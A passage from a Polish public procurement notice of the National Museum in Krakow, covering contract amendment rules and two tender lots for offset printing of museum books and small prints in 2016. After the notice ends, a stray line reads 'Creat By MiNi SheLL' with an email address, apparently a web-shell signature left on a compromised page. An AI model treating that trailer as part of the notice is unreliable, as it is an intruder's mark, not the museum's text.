7)liczby stron w zamawianych drukach. W takim przypadku Wykonawca przedstawi Zamawiającemu kalkulację ceny związanej ze zmianą liczby stron.
Warunki wprowadzenia zmiany:
- zmianę w umowie może inicjować zamawiający. Wniosek o zmianę może zgłosić osoba wskazana w umowie do nadzoru nad jej realizacją. Wniosek taki jest podstawą do przygotowania aneksu. Wykonawca na wniosek Zamawiającego powinien przedstawić niezwłocznie stosowną rekalkulację w sposób umożliwiający zawarcie aneksu. Jej nieprzedstawienie oznaczać będzie wyrażenie zgody na przyjęcie kalkulacji Zamawiającego.
8)zmiana sposobu bigowania/falcowania druków drobnych, pod warunkiem, że zmiana ta nie spowoduje zmiany wartości ceny oferowanych druków.
Warunki wprowadzenia zmiany:
- Zmianę w umowie może inicjować zamawiający. Wniosek o zmianę może zgłosić osoba wskazana w umowie do nadzoru nad jej realizacją. Wniosek taki jest podstawą do przygotowania aneksu.
9)zmiana w zakresie podwykonawstwa. 
Warunki wprowadzenia zmiany: 
Wykonawca może dokonać zmiany w zakresie prac zleconych podwykonawcom jak również zmienić podwykonawców lub wskazać podwykonawców w nowym zakresie. Nowo wskazani podwykonawcy wymagają akceptacji pisemnej Zamawiającego. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, wykonawca jest obowiązany wykazać, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. W celu wprowadzenia zmiany wykonawca przedłoży wniosek zawierający określenie rodzaju zmiany, termin wprowadzenia zmiany, a w przypadku gdy wykonawca zmienia podwykonawcę, na którego zasoby powoływał się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasadach określonych w art. 26 ust. 26 ustawy, dodatkowo przedkłada też dokumenty w celu wykazania, że nowy podwykonawca spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia publicznego. 
Zmiana w zakresie podwykonawstwa wprowadzona zostanie aneksem do umowy po zatwierdzeniu przez zamawiającego  wniosku   o zmianę.
UWAGA: Dokonanie zmian w zakresie:
-  tytułu danego wydawnictwa przy zachowaniu jego parametrów i ceny,
- osób odpowiedzialnych za realizację umowy, 
nie wymaga wprowadzania zmiany w formie aneksu. 
Zmiany powyższe mogą być uzasadnione przyczynami prawnymi, organizacyjnymi i technicznymi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.malopolska.pl/mnkrakow/Article/id,240951.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Narodowe w Krakowie, Al. 3-go Maja 1, 30-062 Kraków, pok. 050..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2016 godzina 10:00, miejsce: Muzeum Narodowe w Krakowie, Al. 3-go Maja 1, 30-062 Kraków, pok. 050..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1 -  druk offsetowy wydawnictw książkowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest druk offsetowy następujących wydawnictw książkowych (wszystkie wydawnictwa wskazane poniżej mają numer ISBN):
1.PAŁAC PREZYDENCKI 
2.INFORMATOR MNK DLA NAUCZYCIELI
3.KATALOG DO WYSTAWY MARIA. MATER MISERICORDIAE (WERSJA POLSKO-ANGIELSKA)
4.PRZEWODNIK EDUKACYJNY DO WYSTAWY MARIA. MATER MISERICORDIAE (WERSJA POLSKA)
5.PRZEWODNIK EDUKACYJNY DO WYSTAWY MARIA. MATER MISERICORDIAE (WERSJA ANGIELSKA)
6.OFERTA DLA MECENASA
7.BROSZURKA DO WYSTAWY MADONNA W GIRLANDZIE KWIATOWEJ
8.BROSZURKA DO WYSTAWY PAPIESKI SPLENDOR
9.BROSZURKA 
Warunki realizacji zamówienia. 

-Druk będzie się odbywał według normy densytometrycznej DIN 16 536 NB z filtrem polaryzacyjnym o wielkości umożliwiającej pomiar densytometrem. 
-Wykonawca wykona i dostarczy do siedziby Zamawiającego do akceptacji proofy kolorystyczne (min. 2 - max. 8 dla danej  pozycji książkowej zgodnie z wykazem wydawnictw książkowych wskazanych w załączniku nr 1.1 do specyfikacji) do 1 dnia roboczego od dnia przekazania przez Zamawiającego plików do druku. Ilość proofów dla wydawnictw książkowych zgodnie z deklaracją w ofercie Wykonawcy 
Wykonawca dostarczy Zamawiającemu do akceptacji proofy kolorystyczne na własny koszt. Proofy kolorystyczne winny być wykonane z plików, które zostały zatwierdzone do druku przez Zamawiającego. Skala proofów - 1:1. Proof winien być wykonany przy zastosowaniu profilu ICC uzyskanego zgodnie z surowcem, na którym będzie wykonany druk wg normy ISO 12647-2. 
Na każdym proofie wymagane jest zamieszczenie paska kontrolnego wraz z certyfikacją. Brak certyfikacji uniemożliwia wykorzystanie proofu jako materiału stanowiącego wzorzec dla Zamawiającego. 

-Ponadto Wykonawca wykona oraz dostarczy do siedziby Zamawiającego - zgodnie ze szczegółowymi wymaganiami, określonymi dla każdej pozycji w załączniku nr 1.1 do specyfikacji, ozalid w wersji papierowej do akceptacji w terminie do 1 dnia roboczego od dnia przekazania przez Zamawiającego plików do druku, przy czym dostawa i odebranie ozalidu odbędzie się na koszt Wykonawcy (gdzie wymagane, zgodnie z wymaganiami określonymi w załączniku nr 1.1 do specyfikacji).

Zamawiający dokona oceny ww. materiałów: proofów i ozalidów - w terminie do  1 dnia roboczego od ich przekazania przez Wykonawcę. W ramach ww. czynności Zamawiający może wnieść uzasadnione uwagi do przekazanego materiału, a  Wykonawca zobowiązany jest do poprawy materiału i przedstawienia go do ponownej akceptacji Zamawiającemu w terminie do 1 dnia roboczego od dnia przekazania uwag.
Po zaakceptowaniu ww. materiałów, Wykonawca wykona i przekaże Zamawiającemu odpowiednie nakłady poszczególnych wydawnictw, przy czym dla zachowania umownego terminu realizacji umowy  określonego przez ilość dni od daty przekazania Wykonawcy przez Zamawiającego plików do druku, nie mają wpływu terminy związane z wprowadzeniem poprawek przez Wykonawcę. 
-Wykonawca zapewni autorowi projektu graficznego wydawnictw możliwość zatwierdzenia do druku wydawnictw, w tym celu Wykonawca przekaże pisemnie informacje w zakresie terminu druku w drukarni na co najmniej 2 dni robocze przed realizacją druku. 

-Wykonawca zapewni transport (dostawa wraz z wniesieniem) gotowych wydawnictw do siedziby Zamawiającego na własny koszt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.12.00.00-7, 22.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. ilość dostarczonych proofów książkowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie nr 2 -  druk offsetowy wydawnictw drobnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest druk offsetowy następujących wydawnictw drobnych:
I. WYDAWNICTWA DO WYSTAW:
1. DRUKI DO WYSTAWY MADONNA W GIRLANDZIE KWIATOWEJ:
A. ULOTKA
B. PLAKAT
C. KARTKA POCZTOWA (REPRODUKCJA)
2. DRUKI DO WYSTAWY MARIA. MATER MISERICORDIAE:
A. KARTKA POCZTOWA
B. MAPKA (WERSJA POLSKA)
C. MAPKA (WERSJA ANGIELSKA)
3. DRUKI DO WYSTAWY NIECH ŻYJE SZTUKA. KOLEKCJA FELIKSA JASIEŃSKIEGO:
A. ULOTKA SKŁADANA
II. WYDAWNICTWA PROMOCYJNE:
1. PLAKAT
2. AFISZ ATMA
3. PLAKAT ARSENAŁ
4. ULOTKA SKŁADANA SUKIENNICE (WERSJA POLSKA)
5. ULOTKA SUKIENNICE
6. ULOTKA SKŁADANA O/MEHOFFER
7. ULOTKA SKŁADANA EUROPEUM
8. ULOTKA ARSENAŁ
9. ULOTKA SKŁADANA Z MAPKĄ
10. ULOTKA SKŁADANA
III.  DRUKI EDUKACYJNE
1. ULOTKA SKŁADANA EDUKACYJNA
IV. DRUKI FIRMOWE
1. KOPERTY FIRMOWE C5
2. KOPERTY FIRMOWE C4
3. KOPERTY FIRMOWE DL
4. PAPIER FIRMOWY (I WZÓR)
Warunki realizacji zamówienia. 

-Druk będzie się odbywał według normy densytometrycznej DIN 16 536 NB z filtrem polaryzacyjnym o wielkości umożliwiającej pomiar densytometrem. 

- Wykonawca, zgodnie ze szczegółowymi wymaganiami, określonymi dla każdej pozycji w załączniku nr 1 do specyfikacji, przekaże Zamawiającemu ozalidy drogą elektroniczną (zgodnie z załącznikiem nr 1.2 do specyfikacji) - do 1 dnia roboczego od dnia przekazania przez Zamawiającego plików do druku. 
Zamawiający dokona oceny ww. materiałów: ozalidów - w terminie do  1 dnia roboczego od ich przekazania przez Wykonawcę. W ramach ww. czynności Zamawiający może wnieść uzasadnione uwagi do przekazanego materiału, a  Wykonawca zobowiązany jest do poprawy materiału i przedstawienia go do ponownej akceptacji Zamawiającemu w terminie do 1 dnia roboczego od dnia przekazania uwag.
Po zaakceptowaniu ww. materiałów, Wykonawca wykona i przekaże Zamawiającemu odpowiednie nakłady poszczególnych wydawnictw, przy czym dla zachowania umownego terminu realizacji umowy określonego przez ilość dni od daty przekazania Wykonawcy przez Zamawiającego plików do druku, nie mają wpływu terminy związane z wprowadzeniem poprawek przez Wykonawcę. 
-Wykonawca zapewni autorowi projektu graficznego wydawnictw możliwość zatwierdzenia do druku wydawnictw, w tym celu Wykonawca przekaże pisemnie informacje w zakresie terminu druku w drukarni na co najmniej 2 dni robocze przed realizacją druku. 

-Wykonawca zapewni transport (dostawa wraz z wniesieniem) gotowych wydawnictw do siedziby Zamawiającego na własny koszt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.12.00.00-7, 22.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com